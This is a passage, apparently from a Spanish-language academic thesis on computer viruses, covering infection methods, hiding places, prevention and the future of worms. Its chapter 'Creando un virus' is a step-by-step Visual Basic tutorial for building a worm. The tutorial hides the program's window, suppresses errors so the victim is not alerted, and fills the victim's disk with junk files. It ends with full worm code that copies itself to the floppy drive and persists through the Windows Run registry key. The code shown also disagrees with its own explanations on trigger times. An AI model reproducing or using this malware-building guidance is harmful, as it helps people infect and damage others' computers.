atienden a una serie de instrucciones programadas como el ocultarse y
reproducirse mientras se cumplen unas determinadas opciones predeterminadas

52
por el creador del virus. Así, el virus permanece escondido reproduciéndose en
espera de activarse cuando se cumplan las condiciones determinadas por el
creador. Este proceso puede ser muy rápido en algunos casos y bastante largo,
según el tipo de virus.

5.6.3 La replicación. La replicación consiste en la producción del propio virus,

una copia de si mismo, que se situara en otro archivo distinto al que ocupa. De
esta forma el virus infecta a otros archivos y otros programas, asegurándose de
que el proceso de multiplicación esta asegurado. Además, el virus asegura su
extensión a otros ordenadores y debe hacerlo de la forma más discreta y rápida
posible. En este momento el virus no se manifiesta, ya que solo se instala en otros
equipos y entre más contagio mejor. Solo de esta forma, las posibilidades que
tendrá para ejercer algún daño será en un mayor número de ordenadores
(Hernández, 2005)31.

5.6.4 El ataque. Cuando se cumplen las condiciones, efectuadas por el creador

del virus, este entra en actividad destructora. Aquí es donde formatea el disco duro
o borra archivos con extensión COM o EXE por dar algunos ejemplos. El ataque
es el escalón final del trabajo del virus. Cuando se llega a este punto el trabajo ha
culminado. El ordenador se encuentra infectado y si no se dispone de un
programa que elimine el virus, jamás se podrá recuperar los archivos. Se pueden
instalar de nuevo el software, pero de nuevo se tiene la destrucción de la unidad
con el hecho de que se cumplan los acontecimientos antes citados (Hernández,
2005)31.

5.7 FORMAS DE INFECCIÓN

Un virus no puede ejecutarse por si solo, necesita un programa portador para

poder cargarse en memoria e infectar. Este necesita modificar la estructura, para
que durante su ejecución pueda realizar una llamada al código del virus. Las
partes del sistema más susceptibles de ser infectadas son el sector de arranque
de los diskettes, la tabla de partición y el sector de arranque del disco duro, y los
ficheros ejecutables (*.EXE y *.COM) (El Hacker, 2005)20.

Para cada una de estas partes tenemos un tipo de virus, aunque muchos son
capaces de infectar por sí solos estos tres componentes del sistema. En los
diskettes, el sector de arranque es una zona situada al principio del disco, que
contiene datos relativos a la estructura del mismo y un pequeño programa, que se
ejecuta cada vez que arrancamos desde diskette.

En este caso, al arrancar con un disco contaminado, el virus se queda residente

en memoria RAM, y a partir de ahí, infectara el sector de arranque de todos los

53
disquetes a los que se accedan, ya sea al formatear o al hacer un DIR en el disco,
dependiendo de cómo esté programado el virus.

El proceso de infección consiste en sustituir el código de arranque original del

disco por una versión propia del virus, guardando el original en otra parte del
disco; a menudo el virus marca los sectores donde guarda el boot original como
en mal estado, protegiéndolos así de posibles accesos, esto suele hacerse por
dos motivos: primero, muchos virus no crean una rutina propia de arranque, por lo
que una vez residentes en memoria, efectúan una llamada al código de arranque
original, para iniciar el sistema y así aparentar que se ha iniciado el sistema como
siempre, con normalidad. Segundo, este procedimiento puede ser usado como
técnica de ocultamiento.

Normalmente un virus completo no cabe en los 512 bytes que ocupa el sector de
arranque, por lo que en éste suele copiar una pequeña parte de si mismo, y el
resto lo guarda en otros sectores del disco, normalmente los últimos, marcándolos
como defectuosos. Sin embargo, puede ocurrir que alguno de los virus no
marquen estas zonas, por lo que al llenar el disco estos sectores pueden ser
sobrescritos y así dejar de funcionar el virus.

La tabla de partición esta situada en el primer sector del disco duro, y contiene una
serie de bytes de información de cómo se divide el disco y un pequeño programa
de arranque del sistema. Al igual que ocurre con el boot de los disquetes, un virus
de partición suplanta el código de arranque original por el suyo propio; así, al
arrancar desde disco duro, el virus se instala en memoria para efectuar sus
acciones. También en este caso el virus guarda la tabla de partición original en
otra parte del disco, aunque algunos la marcan como defectuosa y otros no.

Muchos virus guardan la tabla de partición y a ellos mismos en los últimos

sectores de disco, y para proteger esta zona, modifican el contenido de la tabla
para reducir el tamaño lógico del disco. De esta forma el sistema operativo no
tiene acceso a estos datos, puesto que ni siquiera sabe que esta zona existe.

Casi todos los virus que afectan la partición también son capaces de hacerlo en el
boot de los diskettes y en los archivos ejecutables; un virus que actuara sobre
particiones de disco duro tendría un campo de trabajo limitado, por lo que suelen
combinar sus habilidades. El tipo de virus que más abunda son los de archivo; en
este caso usan como vehículo de expansión los archivos de programa o
ejecutables, sobre todo .EXE y .COM, aunque también a veces .OVL, .BIN y .OVR
(El Hacker, 2005)20.

AL ejecutarse un programa infectado, el virus se instala residente en memoria, y a

partir de ahí permanece al acecho; al ejecutar otros programas, comprueba si ya
se encuentran infectados. Si no es así, se adhiere al archivo ejecutable, añadiendo

54
su código al principio y al final de éste, y modificando su estructura de forma que
al ejecutarse dicho programa primero llama al código del virus devolviendo
después el control al programa portador y permitiendo su ejecución normal.

El virus al adherirse al archivo hace que este aumente de tamaño al tener que
albergar en su interior al virus, siendo esta circunstancia muy útil para su
detección. De ahí que la inmensa mayoría de los virus sean programados en
lenguaje ensamblador, por ser el que genera el código más compacto, veloz y de
menor consumo de memoria; un virus no seria efectivo si fuera fácilmente
detectable por su excesiva ocupación en memoria, su lentitud de trabajo o por un
aumento exagerado en el tamaño de los archivos infectados. No todos los virus de
fichero quedan residentes en memoria, si no que al ejecutarse el portador, éstos
infectan a otro archivo, elegido de forma aleatoria un directorio (El Hacker, 2005)20.

5.8 DONDE SE OCULTAN LOS VIRUS

Un virus utiliza sus propias medidas de ocultamiento, pudiendo este "ocultarse" en

diferentes lugares. Algunos de ellos podrían ser los siguientes:

- En memoria principal: en este caso el virus se colocará automáticamente en la

memoria principal (memoria RAM) esperando que se ejecute algún programa
(fichero con extensión EXE o COM) para infectarlo. Ese tipo de virus, se denomina
residente.

- Documentos con macros: por regla general, los archivos que no sean programas,
no son infectados por ningún tipo de virus. Sin embargo, existen determinados
tipos de documentos (ficheros o archivos) con los que el usuario puede trabajar, o
que puede crear, que permiten incluir en ellos lo que se denomina macro.
Una macro es un conjunto de instrucciones o acciones que otro programa puede
llevar a cabo. Pues estas macros pueden formar parte del documento (texto, hoja
de cálculo o base de datos) y por tratarse de programas pueden ser infectados por
los virus (virus de macro).

- Sector de arranque (Boot y Master Boot): el sector de arranque es una sección

concreta de un disco (disquete o disco duro) en la que se guarda la información
sobre las características de disco y sobre el contenido del mismo. Cuando se
habla del sector de arranque de un diskette se utiliza el término BOOT, mientras
que si se trata del sector de arranque de un disco duro, se emplea el término
Master BOOT (MBR). En ocasiones, esta sección de un disco contiene un
programa que permite arrancar el ordenador. Algunos virus (los virus de Boot) se
esconden en este lugar infectando ese programa y haciendo, en el arranque del
ordenador, que se ejecute el virus (Alerta virus, 2005)3.
- Ficheros adjuntos a los mensajes de correo electrónico: cada vez más se utiliza
el correo electrónico para el envío de ficheros. Estos ficheros acompañan al
mensaje (ficheros adjuntos, anexos o attachments) de texto que se envía,

55
pudiendo estar infectados. Generalmente, cuando se reciben el destinatario no
sospecha que el fichero recibido puede contener un virus o que este lo sea, pero
al abrir el mensaje y posteriormente abrir el fichero que dentro de él se incluye
podría llevarse una sorpresa desagradable.

- Páginas Web en Internet: las páginas que se visitan a través de la navegación

por Internet, son ficheros que por regla general no deberían estar infectados ya
que se trata de documentos de texto (texto, imágenes, sonido). Sin embargo éstas
pueden incluir otros elementos denominados Applets de Java o Controles
ActiveX. Estos son programas que dotan a la página Web de mayor dinamismo,
presentaciones y en definitiva, posibilidades. Por tratarse de programas pueden
estar infectados e infectar al usuario que visita la página que los contiene (Alerta
virus, 2005)3.

5.9. COMO SABER SI SE TIENE UN VIRUS

Muchos virus se anuncian ellos mismos produciendo un sonido o mostrando un

mensaje en su pantalla o impresión, pero también es común que un virus no
muestre señales de su presencia en absoluto. Los virus se comportan de
diferentes formas y no existe un signo indicador absoluto que avise de su
presencia. Algunos síntomas al tener un virus puede ser la disminución general del
funcionamiento del ordenador, una disminución de la memoria, cambios de
archivos, o un disco duro que gira sin razón aparente. Sin embargo, el software
legítimo también puede hacer que su ordenador muestre dichas características. Lo
mejor es instalar un software anti-virus que pueda escanear y detectar la
presencia de la mayoría de los virus (Alerta virus, 2005)4.

5.10. CÓMO SE IMPIDE LA INFECCIÓN DE UN VIRUS

La mejor forma para impedir la infección de un virus es la prevención algunos

puntos a tener en cuenta son los siguientes:

1. La mejor herramienta para combatir los virus es saber como actúan, infectan y
se propagan.

2. Saber el origen de cada programa que se carga en el ordenador y se debe estar

seguro de que viene de una fuente de confianza.

3. Hacer siempre una copia de seguridad de los datos en caso de que un virus
dañe irreparablemente los archivos (Alerta virus, 2005)4.

4. Tener un disco de arranque con protección de escritura que se haya creado en

un ordenador libre de virus en caso de que el ordenador se infecte en el futuro. De
esta forma se va ha poder acceder y diagnosticar en el equipo en caso de
infección.

56
5. La última línea de defensa es tener software antivirus instalado en el
ordenador. Lo ideal es que hubiera dos o más paquetes de software diferentes
de antivirus. El software antivirus no es efectivo a no ser que esté actualizado.
Los antivirus se fían de la información de sus fabricantes para mantenerlos
informados sobre cuales son los últimos virus y como combatirles. Esta
información les llega en forma de un archivo de definición. Un antivirus debería
estar actualizado a menudo (cada 2 semanas). Esto asegurará que el antivirus
está funcionando con lo último cuando chequee y limpie los nuevos virus (Alerta
virus, 2005)4.

57
 6. CREANDO UN VIRUS

6.1 NOMENCLATURA DE LOS NOMBRES DE VIRUS

En los Virus de Macro el primer carácter indica la aplicación, el número que

sigue la versión de la aplicación, y acaban con el carácter "M".

Primer carácter:

"A" - Microsoft Access.

"O" - Microsoft Office.
"V" - Visio 2000
"X" - Microsoft Excel.

Ejemplos:

A97M - Virus de macro que funciona en Access 97.

AM - Virus de macro que funciona en Access 95
XM - Infecta documentos de Excel 95.
V4M - Infecta la versión 4 de Visio.

En el caso de Microsoft Excel, también es posible contagiarse con las fórmulas,

en este caso en lugar de usar la letra "M" al final se usa la letra "F" de fórmula.

Ejemplo: X97F - infectan los ficheros de fórmulas de Excel 97

A parte de lo anterior tenemos los virus escritos en VBS o JavaScript.

VBS: Virus de Visual Basic Script, como el ILOVEYOU o el Timofónica.
JS: Virus de JavaScript.
UNIX: Funcionan en Unix/Linux, están hechos usando lenguaje de shell.

Para los virus tradicionales escritos en ensamblador o algún lenguaje

compilable, se usa una combinación de tres caracteres que indican en qué
plataforma funcionan.

W2K: Funciona en Windows 2000.

W32: Funciona en plataformas Windows de 32 bits. (Windows 95, 98,

ME, NT, 2000, XP).

W95, Win95: Funciona en Windows 95 y 98.

WNT: Funciona en Windows 32 (Google, 2005)29.

58
Después de los tres primeros caracteres, la barra "/" y un nombre, algunas veces
suele ser alguna cadena de texto que se puede encontrar dentro del virus,
otras veces el nombre lo ha puesto el propio programador del virus, en algunas
ocasiones incluso se usa un número que indica el tamaño en octetos que ocupa
el virus.

Ejemplo: VBS/Loveletter
W32/Petador

En algunas ocasiones, un virus puede ser una mutación o variante de otro, por lo
que se indica con una letra adiccional separado del nombre con un punto:

Ejemplo: VBS/Loveletter.A
VBS/Loveletter.B
W32/Petador.A
W32/Petador.B

Los virus más antiguos, de la época del DOS, no usan la nomenclatura de

los tres primeros caracteres, como por ejemplo:

Flip
Barrotes
4096
(Google, 2005)29.

6.2 El REGISTRO DE WINDOWS

El Registro de Windows es utilizado en algunos códigos de virus, para que estos

puedan ejecutarse al iniciar el sistema operativo, o simplemente para que los
antivirus no los puedan detectar ya que al cambiar algún Registro estos programas
se camuflan tras la fachada de cualesquier otro proceso de algún aplicativo y así
el virus se ejecute sin que estos sean detectados por los programas de seguridad.

Pero en realidad que es el Registro de Windows; con las versiones anteriores a

Windows 95 (o sea hasta el Windows 3.11) el sistema se valía de los archivos
WINDOWS.INI y SYSTEM.INI para enterarse de qué archivos controladores y
demás debía cargar para manejar correctamente los dispositivos (como ser placas
de sonido, video, scanner, CD ROM, etc...) estos archivos INI eran simples
archivos de texto que tenían el siguiente formato (Donatién, 2005)18:

[nombre_de_sección]
variable_1=valor_1
variable_2=valor_2
...
variable_n=valor_n

59
Por ejemplo, en la sección CD-ROM (si es que existía una) podría haberse leído
algo como lo siguiente:

Driver=C:\windowssystemcdrom.drv
Nombre dispositivo=Sony CDU 99 4/A
Cache=512

Con Windows 95 estos archivos fueron reemplazados por el sistema de Registro

de 32 bits, que puede incluir datos de varios tipos, no sólo texto, entre estos tipos
está el Binario.

Por este motivo el registro de Windows que antes era un simple TXT pasó a ser
un archivo binario (una base de datos) que sólo puede ser editado con un
programa para tal fin. El programa que da Microsoft para hacer esto es el
REGEDIT. Ver figura 1.

Figura 1. Ventana de Regedit

Este no fue el único cambio que se realizó sobre los archivos de inicio que ahora
se llaman Registro, ahora por ejemplo no sólo se pueden crear "subsecciones"
llamadas "llaves" o en inglés keys (por ejemplo la subsección que antes era "CD-
ROM") sino que se pueden crear unas dentro de otras como si se trataran de
subdirectorios.

60
Con el REGEDIT.EXE se pueden recorrer estas secciones con facilidad y
modificar las variables que en ellas se encuentren. Para ejecutar el Regedit se
debe entrar en la opción Ejecutar del menú inicio y escribir y Regedit luego
aceptar (Donatién, 2005)18.

Se debe tener en cuenta que alguna modificación a las opciones que Windows
lee al reiniciar puede causar que algún elemento de la computadora no funcione
correctamente la próxima vez.

El Registro no sólo tiene información del arranque de Windows, sino cualquier

dato que las aplicaciones quieran almacenar en él, por eso es muy extenso, y
encontrar alguna información requiere de cierta práctica y experiencia (Donatién,
2005)18.

6.3 QUE SON LAS API

Las API (“application programming interface” o “interfaz de programación de la

aplicación”) de Windows son un conjunto de funciones propias del sistema
operativo que se pueden usar en los programas, como por ejemplo, la función
“SetWindowPos” que permite mantener una ventana por encima de las demás.

Todas estas funciones de Windows están escondidas dentro de unas cuantas

DLLs (“Dynamic Link Library” o “Librería de Enlace Dinámico”) agrupadas
según la función que realizan:

Kernel32.dll – operaciones de archivos y gestión de memoria.

Gdi32.dll – operaciones gráficas
User32.dll – maneja la parte de la interacción con el usuario.

También existen otros DLLs que, aunque menos importantes, también se aplican
a los programas:

Winmm.dll – se encarga de la parte multimedia

Comdlg32.dll – controles comunes para todas las aplicaciones
(Ciberteca, 2005)11.

6.3.1 Qué es el API win32. Es un conjunto de funciones, tipos y mensajes

predefinidos para poder programar sobre los sistemas operativos de 32 bits de
Microsoft. El API Win32, surge para cubrir la necesidad de crear un sistema
operativo de 32 bits como es Windows 95, Windows 98, Windows 2000,
Windows Xp, etc. Frente al API de 16 bits que existia anteriormente como lo era
el Windows 3.1.

61
Un programador que utilice aplicaciones para Windows en este caso que haga
uso de este recurso para crear virus, además de conocer el entorno de trabajo de
Windows debe conocer también su entorno de programación, al que se le conoce
generalmente como interfaz de programación de aplicaciones de Windows
(Windows Application Programming Interface, abreviadamente Windows API).
La característica primaria de la API de Windows son las funciones y los mensajes
internos/externos de Windows (FalKen, 2005)25.

Las funciones Windows son el corazón de las aplicaciones Windows. Hay más
de 600 funciones de Windows dispuestas para ser llamadas por cualquier
lenguaje, como C o Visual Basic. A través de estos mecanismos, se puede
realizar gran cantidad de funciones. La utilización de ésta serie de librerías que
contienen las funciones de la API pueden solucionar gran cantidad de problemas
en la programación, aunque por otro lado no se debe desestimar el gran poder
destructivo de las mismas.

La depuración de un programa es muy diferente si éste tiene incorporadas

llamadas a APIs, ya que el resultado de las mismas en algunos casos puede
llegar a ser incomprensible. Cuando se trabaja con éstas funciones siempre es
recomendable tener a mano una buena guía o bien tener a mano alguien que
sepa, para no encontrarnos con posibles problemas.

Las dos principales ventajas que se obtiene con la utilización de APIs es la gran
funcionalidad que se le puede dar a una aplicación, y en segundo lugar la gran
velocidad de proceso, ya que a menudo es mucho más rápido realizar una función
a través de la API adecuada que por medio del lenguaje en si mismo.

Los mensajes son utilizados por Windows para permitir que dos o más
aplicaciones se comuniquen entre sí y con el propio sistema Windows. Se dice
que las aplicaciones Windows son conducidas por mensajes o sucesos.

Conocer todas las APIs de Windows es imposible, ya que tiene gran similitud con
el hecho de tener que aprenderse el directorio telefónico. Lo que se debe hacer es
realizar un razonamiento contrario, al tener una necesidad al programar, y se debe
pensar que eso tiene alguna solución con una API.

6.3.2 Que son las librerías Dinámicas (DLLs). Casi todas las APIs de
Windows se unen formando librerías de enlace dinámico. Una librería dinámica
(Dynamic Link Libraries, abreviadamente DLLs) permite que las aplicaciones
Windows compartan código y recursos. Una DLL es actualmente un fichero
ejecutable que contiene funciones de Windows que pueden ser utilizadas por
todas las aplicaciones. Si bien en DOS se utilizaban librerías de enlace estático,
es decir, a la hora de compilar se incluían junto con el código, y de esta manera
cuando se ejecutaba la aplicación, todas las librerías se cargaban en memoria
esperando a ser invocadas.

62
Sin embargo, cuando se trabaja con DLLs, el enlace con la aplicación es dinámico
en tiempo de ejecución. Una DLL no se incluye dentro del código, sino que en el
momento en que se realiza la llamada a la función, la DLL se carga en memoria,
se utiliza la API, y a continuación se descarga.

La gran ventaja que posee este método es que no es necesario tener gran
cantidad de código cargado en memoria a la hora de ejecutar la aplicación. Por el
contrario, es necesario que cuando se lleve el ejecutable a otra instalación, se
tenga que llevar las DLLs necesarias (FalKen, 2005)25.

Pero si se tiene que pensar que si se utilizan las DLLS que proporciona Windows,
en cualquier máquina con este sistema operativo vamos a encontrar esas mismas
DLLs, con lo cual no es necesario que se tenga que cargar con ellas.

La utilización de librerías dinámicas tiene ventajas. Una ventaja es que como

están separadas del programa se pueden actualizar sin tener que modificar los
programas que las utilizan. Otra ventaja es el ahorro de memoria principal y de
disco ya que como es Windows quien administra la utilización de las DLLs, no
existe duplicidad de código cuando varias aplicaciones las utilizan.

Pero también tienen inconvenientes. Uno de ellos es el tiempo que Windows tiene
que emplear en leer las funciones que el programa necesita utilizar de una DLL.
Otra desventaja es que cada programa ejecutable necesita que estén presentes
las DLLs que utiliza.

Cuando se utilizan librerías estáticas, las funciones que el programa necesita se

incluyen en el mismo, por lo que ni se pierde tiempo en leerlas ni la librería tiene
que estar presente. La mayoría de éstas librerías suelen estar localizadas en el
directorio SYSTEM de Windows. Dentro de Windows se tiene gran cantidad de
DLLs, agrupando las APIs en funciones respecto a un mismo tema. Además en
cada nueva versión de Windows, posiblemente salgan más DLLs para utilizar.
Para acceder a las funciones de las librerías dinámicas, lo primero que se debe
hacer es declararlas (FalKen, 2005)25.

6.4 INICIO Y FINAL DE UN CÓDIGO EN VISUAL BASIC

Visual Basic es un entorno de programación de aplicaciones creado por

Microsoft, a continuación se proporciona la información necesaria para crear una
rutina de un programa residente en Visual Basic 6.0. Al crear un proyecto EXE
estándar en Visual, se observa que se crea un panel en donde es posible colocar
botones, cuadros de texto, etc., en este caso eso es irrelevante para el programa
que se quiere crear. Al hacer doble clic en ese panel llamado FORM, se observa el
código interno del panel. Las únicas líneas de código existente son las siguientes.

63
Private Sub Form_Load()

End Sub

Estas son las etiquetas principales, el inicio y el final del programa, que de aquí en
adelante será referenciado como “formulario” (Kuasanagui, 2005)37.

Private Sub Form_Load() ----------- es la primera línea de código que se lee del
formulario
End Sub ----------- es la etiqueta que da fin a la rutina

Dentro de estas se coloca el código que queremos que se pretende ejecutar. Se

presenta como ejemplo la mundialmente conocida aplicación hola mundo.

Private Sub Form_Load()

MsgBox “¡Hola Mundo!”
End Sub

Al ejecutar este código se obtiene la siguiente salida (Figura 2):

Figura 2. Salida MsgBox

Después de hacer clic en Aceptar, se abrirá el formulario en blanco en el cual se

introdujo el código del saludo. Es necesario ocultar esta ventana para no hacer
evidente la ejecución del virus (Figura 3).

Figura 3. Form

64
6.5 SUBRUTINAS

La subrutinas reducen considerablemente el tamaño del código, lo cual resulta

conveniente para la creación de un virus. Agrupan líneas de código que se usan
repetidamente en el programa (Kuasanagui, 2005)37.

Sub Form_Load()
hola_mundo
End Sub
Sub hola_mundo()
MsgBox "¡Hola Mundo!"
End Sub

6.6 FileCopy

Es el comando que copia archivos en Visual Basic. Esta es la sintaxis para copiar
el Worm en cuestión:

FileCopy “Archivo origen” , “Archivo destino”

Ejemplo:

FileCopy “A:\Gusano.EXE” , “C:\GusanoClon.EXE”

6.7 App.EXEName

El darle un nombre estático al Word limita considerablemente su radio de acción,

debido a que el programa solo se copiara si se encuentra en o si tiene A:\, además
si el nombre es modificado no se copiará.

Para solucionar este problema se tiene este comando que copia el archivo sin
importar el lugar donde esté ubicado, esta es “App.EXEName”, con esta
instrucción se obtiene el nombre de la aplicación, esto es útil, ya que así el worm
no dependerá de un solo nombre, el comando se encarga de averiguarlo.

Si el worm se llama “Gusano” al ejecutar el programa, el valor de App.EXEName

será: Gusano, sin embargo, aún es necesario definir la extensión.

Ahora uniendo las dos instrucciones, “FileCopy” y “App.EXEName” se obtiene lo

siguiente:

Sub Form_Load()
FileCopy App.EXEName & “.EXE” , “C:\GusanoClon.EXE”
End Sub

65
A diferencia de lo hecho con el programa holamundo, en este caso es necesario
crear el ejecutable previamente, de lo contrario se generará un mensaje de error.

En el menú Archivo se elige Generar Proyecto1.exe, luego se indica la ruta y se

nombra el archivo .exe. Desde esta ubicación es posible ejecutarlo.

Debe mostrarse en la pantalla entonces un formulario en blanco y en la ubicación

indicada en el código el archivo GusanoClon.

Si se desea crear una copia del Worm en el directorio en que se ejecuta, en lugar
de escribir el nombre de la unidad, se escribe un punto y la diagonal: “.\” Visual
Basic entenderá que se pretende copiar en el directorio actual. (Kuasanagui,
2005)37.

6.8 ON ERROR RESUME NEXT

En caso de presentarse un error durante la ejecución del virus no es conveniente

que el usuario victima vea mensajes en la pantalla, esto le advertiría sobre la
ejecución de un programa sospechoso. Por eso es necesario implementar esta
instrucción que le indica a VB que en caso de presentarse un error debe
simplemente pasar a la siguiente instrucción.

6.9 CREAR ARCHIVOS TXT

A veces se deja una firma o un mensaje en un archivo .txt. Para crear archivos,
escribir y cerrar en Visual Basic se utilizan los siguientes comandos.

“Open”, “For”, “As”, “Output”, “Print” y “Close”

Cada vez que se abra o se cree un archivo hay que asignarle un número para
que si se realizan varias aperturas y escrituras estas sean fácilmente identificadas
por el programa.

Open ---------- abre o crea un archivo.

Print ---------- escribe dentro del archivo.
Close ---------- cierra el archivo.

A continuación se presenta la sintaxis:

Open Ruta del archivo For Output As #1

Print #1, Texto del archivo
Close #1

Esto quiere decir: Abrir o crear el archivo, prepararlo para escritura, y asignarle el
numero 1, escribir dentro de 1 un texto y cerrar a 1.

66
De esta manera se pueden dejar firmas en archivos TXT o también crear archivos
con cualquier extensión como EXE o MP3, y aunque esos archivos no funcionen,
servirán para saturar el disco duro de la victima generando basura (Kuasanagui,
2005)37.

Ejemplo: Sub Form_Load()

On Error Resume Next
Open “C:\ Worm.Win32.TXT” For Output As #1
Print #1, “Este TXT lo genero”
Print #1, “el”
Print #1, “Worm.Win32.TutorialVB”
Close #1
End Sub

Esto generara un archivo llamado Worm.Win32.TXT en el directorio raíz de C con

el siguiente contenido (Figura 4):

Figura 4. Firma del Worm

6.10 MINUTE(NOW)

Ahora se explica como hacer una rutina que controle el tiempo de copiado del
worm. En Visual Basic existen comandos para obtener las horas, minutos y
segundos del sistema, uno de ellos es Minute(Now), que será usado primero. Se
evaluará ahora una situación de copiado con IF.

Sub Form_Load()
On Error Resume Next
If Minute(Now) = 3 Then FileCopy App.EXEName & ".EXE",
".\HijodelGusano.EXE"
End Sub

Con esto, si se ejecuta el worm y el minuto actual es 5 el Worm procederá a

copiarse a la computadora en la ruta indicada.

67
Ahora, esta condición solo seria evaluada una sola vez, pero si se incluye dentro
de un ciclo Do el worm estaría residente en la PC, verificando en cada instante si
el minuto actual del sistema es 5, copiándose si son las 12:05, las 6:05, etc...

Ejemplo:

Sub Form_Load()
Do
If Minute(Now) = 4 Then FileCopy App.EXEName & ".EXE", ".\GusanoClon.EXE"
Loop
End Sub

(Kuasanagui, 2005)37.

6.11 SECOND(NOW)

El problema de esto es que como la condición es verificada a cada instante no

pararía de leer la unidad de disquetes, haciendo esta conducta muy sospechosa .
Por lo tanto se debe agregar otro factor como trigger del copiado, ahora se
verificarán el minuto y el segundo actual del sistema. El comando para obtener los
segundos del sistema es Second(Now).

Sub Form_Load()
On Error Resume Next
Do
If Minute(Now)= 5 And Second(Now) = 5 Then FileCopy App.EXEName & ".EXE",
".\K.EXE"
Loop
End Sub

Este al compilarlo y ejecutarlo hará que se copie al directorio actual cada vez que
el minuto y el segundo coincidan con la condición establecida.

68
6.12 OCULTAR EL FORMULARIO DEL PROGRAMA

Para ocultar los formularios del programa a la vista del usuario, se debe ir a la
ventana propiedades y en la opción “Visible”, se cambia de “True” a “False”. Ver
Figura 5 (Kuasanagui, 2005)37.

Figura 5. Ventana de propiedades

69
6.13 CÓDIGO EN VB DE UN WORM RESIDENTE

Private Sub Form_Load()

A = App.EXEName
E = ".exe"
C = "C:\Gusanoh.exe"
On Error Resume Next
FileCopy A & E, C
Set Gusano = CreateObject("WScript.Shell")
Gusano.regwrite
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
Gusanoh", C
Open "C:\Gusanoh.txt" For Output As #1
Print #1, "LINEA DE PRUEBA NUMERO 1"
Print #1, "LINEA DE PRUEBA NUMERO 2"
Print #1, "LINEA DE PRUEBA NUMERO 3"
Print #1, "LINEA DE PRUEBA NUMERO 4"
Print #1, "LINEA DE PRUEBA NUMERO 5"
Print #1, "LINEA DE PRUEBA NUMERO 6"
Close #1
Do
M = Minute(Now)
S = Second(Now)
Y = "A:\Gusanoh.exe"
If M = 0 And S = 0 Then FileCopy A & E, Y
If M = 5 And S = 0 Then FileCopy A & E, Y
If M = 10 And S = 0 Then FileCopy A & E, Y
If M = 15 And S = 0 Then FileCopy A & E, Y
If M = 20 And S = 0 Then FileCopy A & E, Y
If M = 25 And S = 0 Then FileCopy A & E, Y
If M = 30 And S = 0 Then FileCopy A & E, Y
If M = 35 And S = 0 Then FileCopy A & E, Y
If M = 40 And S = 0 Then FileCopy A & E, Y
If M = 45 And S = 0 Then FileCopy A & E, Y
If M = 50 And S = 0 Then FileCopy A & E, Y
If M = 55 And S = 0 Then FileCopy A & E, Y
Loop
End Sub

70
 7. EL FUTURO DE LOS VIRUS

En el pasado reciente los virus computacionales emergieron para capturar nuestra

atención, respeto y miedo. Y como los virus pasados, las futuras variedades no
serán predecibles incluso para las grandes compañías antivirus. Es concebible
que los nuevos tipos de virus serán transformados por avances en nuevas
tecnologías o quizás su evolución pueda seguir trayectorias similares a las
plataformas actuales.

Algunas conjeturas que pueden ser una ojeada a las posibles características de
los futuros virus:

- Explotarán las redes para causar infecciones más rápidamente.

- Atacarán sistemas no específicos y sus rutinas destructivas serán iniciadas

desde rutas múltiples.

- Las fallas de seguridad serán explotadas para tener una mayor cobertura de
infección.

- Virus multiplataforma emergerán en el futuro.

Siempre se debe estar alerta y al tanto de las últimas tecnologías de seguridad. El

futuro, como una comunidad digital global, depende en parte de la capacidad de
administrar las amenazas de virus cuidadosamente, como también los programas
de seguridad diseñados para la protección contra estos.
(Soto, 2005)61.

Un estudio de Nicholas C. Weaver de la universidad de Berkeley titulado “Warhol

worms: The Potential for Very Fast Internet Plagues”, que se encuentra en
[www.cs.berkeley.edu/~nwea ver/warhol.html]. Describe de forma hipotética, como
podrían ser los gusanos de la siguiente generación, a los que denomina “Warhol”
y “Flash”. Virus capaces de infectar todos los ordenadores vulnerables de Internet
en menos de 15 minutos.

El estudio demuestra que las técnicas que utilizan los gusanos actuales para
propagarse son extremadamente ineficientes. En cambio, según este estudio, los
“gusanos Warhol” utilizarían técnicas altamente optimizadas para buscar
ordenadores vulnerables: “hitlist scanning” (lista de servidores vulnerables
elaborada previamente) para la propagación inicial y “permutation scanning”
(técnica que intenta encontrar todos los ordenadores vulnerables en el menor
tiempo posible) para conseguir propagarse de forma auto-coordinada y completa
(Iñaki, 2005)35.

71
El principal problema de este tipo de gusanos es que causarían el daño máximo
antes de que fuese posible una respuesta humana. Para cuando los laboratorios
de las casas antivirus fuesen capaces de desarrollar, probar y poner a disposición
de los usuarios la solución, el virus ya habría terminado su trabajo.

Afortunadamente en la actualidad los gusanos todavía no emplean este tipo de

técnicas para propagarse, sin embargo en Enero del 2003 el virus SQLSlammer
infectó 100.000 ordenadores vulnerables en menos de media hora, y la mayor
parte de ellos en los 15 primeros minutos. El SQLSlammer no es propiamente un
gusano de tipo Warhol, pues no utiliza las técnicas descritas en el estudio, pero
aún así, consiguió demostrar que es posible crear un virus que se propague a
todos los ordenadores vulnerables en un tiempo tan corto que no es viable la
respuesta humana.

Se puede concluir que el futuro de la seguridad informática necesita un nuevo

enfoque. Las amenazas son cada vez mayores y más rápidas, obligando a que las
empresas de antivirus redoblen esfuerzos y reaccionen cada vez más rápidamente
para evitar las epidemias. Las actuales soluciones de seguridad son
extremadamente eficientes combatiendo amenazas conocidas, pero la exigencia
es cada vez mayor y el hecho de que las actuales soluciones de seguridad sean
inherentemente reactivas, supone una pérdida de tiempo que ahora puede ser
vital. Es importante que estos sean proactivos y se adelanten al problema.

La proactividad en la seguridad informática se debe basar en combatir las nuevas

amenazas que acechan a los sistemas sin necesidad de conocer previamente
cuáles son. Los comportamientos de los códigos maliciosos deben poder
preverse, pero para ello no es suficiente la tecnología actual, es necesario analizar
directamente el protocolo TCP/IP, descubrir intentos de desbordamientos de
buffer, inyecciones de código, cubrir nuevos vectores de propagación, etc...

Dentro de las tecnologías proactivas, destacan las de análisis de comportamiento,

que en pruebas reales han demostrado ser muy efectivas contra virus y otras
amenazas desconocidas. Gracias a estas tecnologías los usuarios, podrán contar
en breve con soluciones que no exijan una reacción, sino que se adelantarán a la
amenaza de malware que intenta llevar a cabo acciones maliciosas.

También dentro de poco podrían aparecer nuevos escenarios de infecciones

víricas; La convergencia de tecnologías que se está produciendo hoy en día
conseguirá que dentro de poco no se pueda distinguir dónde termina un
ordenador y dónde comienza un teléfono, o si la propagación de un virus se
produce a través de una red inalámbrica o mediante conexiones directas entre dos
sistemas (Iñaki, 2005)35.

72
El futuro exacto de lo que serán los virus es difícil de predecir, pero definitivamente
van a resultar mucho más dañinos y difíciles de combatir. Las nuevas tecnologías
y los defectos de software continúan haciendo la propagación de los virus más y
más fácil, y las técnicas antivirus tienen que evolucionar para poder mantener el
mismo paso.

